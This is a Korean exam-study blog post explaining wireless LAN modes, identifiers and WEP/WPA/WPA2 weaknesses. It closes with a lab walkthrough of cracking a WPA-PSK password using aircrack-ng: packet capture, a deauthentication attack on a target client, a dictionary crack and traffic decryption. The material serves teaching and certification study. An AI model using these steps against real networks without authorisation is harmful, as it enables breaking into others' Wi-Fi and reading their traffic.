Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- TSK
- ISMS-P 인증심사원
- 쿠버네티스
- artifacts
- 모의해킹
- ISMS
- iam
- 해킹
- AWS Opensearch
- forensic
- 정보보안
- AWS
- The Sleuth Kit
- 실습
- 보안기사
- isms-p
- CFReDS
- Autopsy
- 정보보안기사
- SMS-P 인증 기준 안내서 요약
- AWS Elasticsearch
- hacking case
- k8s
- AWS 쿠버네티스
- 정보보안기사 실기
- AWS EKS Udemy
- 포렌식
- AWS EKS
- 보안
- kubernetes
Archives
- Today
- Total
Always-Try(정보보안 및 일상)
[정보보안기사][실기] 무선랜 보안(Wireless LAN) 본문
무선랜 구성 방식
더보기
1. Infrastructure 모드
- 각각의 단말기가 무선 AP를 통해 통신하고 단말기 서로 간에는 직접 통신을 하지 않는 방식
2. Ad-hoc 모드
- 각각의 단말기 간에 통신을 통해 무선 도달 범위를 넓히는 방식. AP를 사용하지 않음
SSID, BSS, BSSID, ESS, ESSID, DS, 비콘 프레임/메시지
더보기
1. SSID
- 무선랜 식별자
2. BSS
- 무선랜의 가장 기본적인 망 구성 단위(AP와 단말기)
3. BSSID
- BSS 식별자 (보통 무선 AP의 MAC 주소를 사용)
4. ESS
- 여러 BSS에 의해 구성된 네트워크
5. ESSID
- ESS 식별자
6. DS (Distribution System)
- 무선 AP가 연결 된 유선 네트워크
7. 비콘 프레임/메시지
- 무선 AP가 자신이 관리하는 무선랜(BSS)의 존재를 브로드캐스트 하는 메시지
무선랜 보안 기술
더보기
1. 접속 인증 기술
- SSID 숨김 설정
- MAC 주소 필터링
- 공유키 인증 (PSK:Pre-Shared Key)
- IEEE 802.1x/EAP(인증서버, RADIUS 이용)
2. 데이터 암호 기술
- WEP
- WPA, WPA2
WEP, WPA, WPA2
더보기
1. WEP
- 개요
- IV(24bit)와 고정된 공유키(40bit or 104bit)를 조합하여 암호키를 생성한 후 RC4 알고리즘을 기반으로 PRNG(수도 난수 발생기)에 입력하여 키스트림 생성
- 유선랜과 동등한 수준의 보안성 제공을 위해 탄생함
- 문제점
- IV와 공유키가 짧다. IV를 무작위로 생성하기 하지만 24bit라서 동일한 IV가 사용될 가능성이 있음
- 단방향 인증방식 제공으로 인한 취약성이 존재
- 고정된 공유키를 사용하여 1명이 털리면 다 털림
2. WPA
- 개요
- WEP의 문제점을 보완함
- IV의 크기를 24bit에서 48bit로 늘리고, RC4-TKIP 사용함
- 문제점
- 여전히 취약한 RC4 암호 알고리즘 사용
- TKIP 적용은 S/W 업그레이드를 이용하고 있기 때문에 S/W 처리에 따른 성능 지연 발생
- WEP의 문제점을 보완함
3. WPA2
- 개요
- AES-CCMP 암호방식 사용
- CCMP는 Counter모드 기반의 CBC-MAC을 결합한 CCM을 기반으로 함
- AES-CCMP 암호방식 사용
- WPA/WPA2의 인증방식
- PSK
- Pre Shared Key 즉, 미리 만든 패스워드를 공유하는 방식
- 패스워드를 짧게 설명하면 사전 공격(Dictionary Attack)을 통해 크래킹 당할 수 있음
- IEEE 802.1x/EAP
- EAP는 인증을 하는 프로토콜은 아니지만, 다양한 종류의 인증 방법을 전송하는 역할을 수행함
- Radius와 같은 인증 서버와 연동하여 인증 절차를 진행하는 방식임
- PSK
WPA-PSK 인증 패스워드 크래킹 실습
더보기
1. 도구
- aircrack-ng: 무선랜 모니터링, 크래킹, 분석 도구. 아래 프로그램들이 포함되어 있음
- airmon-ng: 무선랜 인터페이스를 모니터 모드로 전환하는 프로그램
- airodump-ng: 무선 패킷 덤프 뜨는 프로그램
- airreplay-ng: 무선 네티워크에 패킷을 재생성하는 프로그램
- airdecap-ng: 암호화된 패킷 덤프를 복호화 해주는 프로그램
2. 절차
- 무선랜 인터페이스 모니터 모드 활성화
- #iwconfig (무선랜 인터페이스 상태 확인)
- #airmon-ng start wlan0 (wlan0 인터페이스를 모니터 모드로 전환. 유선랜의 무차별모드(promiscuous와 같음)
- 무선랜 네트워크 덤프
- #airodump-ng wlan0mon
- #airodump-ng --bssid 00:08:9F~~~ -c 5 -w wpa wlan0mon
- -c 5: 대상 무선 AP의 채널
- -w wpa: 패킷 덤프파일의 접두어
- wlan0mon 패킷을 수집할 모니터 모드의 무선랜 인터페이스(모니터 모드 전환 시 인터페이스명이 변경됨)
- 무선 AP와 단말 간 재인증이 발생하도록 공격
- #airreplay-ng --deauth 100 -a 00:09:9F~~~ -c AC:EE:9E~~ wlan0mon
- --deauth 100: 인증해제 패킷 전송 횟수 (인증 해제 시, 자동으로 다시 재인증을 시도하므로 전송)
- -a: 대상 무선 AP의 BSSID
- -c: 대상 단말의 MAC 주소
- #airreplay-ng --deauth 100 -a 00:09:9F~~~ -c AC:EE:9E~~ wlan0mon
- 수집한 덤프 파일로 패스워드 크랙 수행
- #aircrack-ng -w ./DIC/pw.list wpa-01.cap
- 크랙한 패스워드를 이용한 무선전송 데이터 복호화
- airdecap-ng -p password -e TEST_AP wpa-01.cap
'정보보안 자격증 + ISMS-P' 카테고리의 다른 글
[정보보안기사][실기] 단답형 기술 용어 , 최신 보안 동향 및 보안 트렌드 파악하기 좋은 사이트 모음 (0) | 2021.09.28 |
---|---|
[정보보안기사][실기] DNS (Domain Name System) (0) | 2021.09.28 |
[정보보안기사][실기] DDoS 공격 유형 및 대응 방법 (0) | 2021.09.27 |
[정보보안기사][실기] 개인정보보호책임자/정보보호최고책임자의 역할/가명처리 절차 (0) | 2021.09.27 |
2021년 ISMS-P 인증심사원 자격 필기 시험 후기 (공부 후기 아님) (0) | 2021.09.12 |
Comments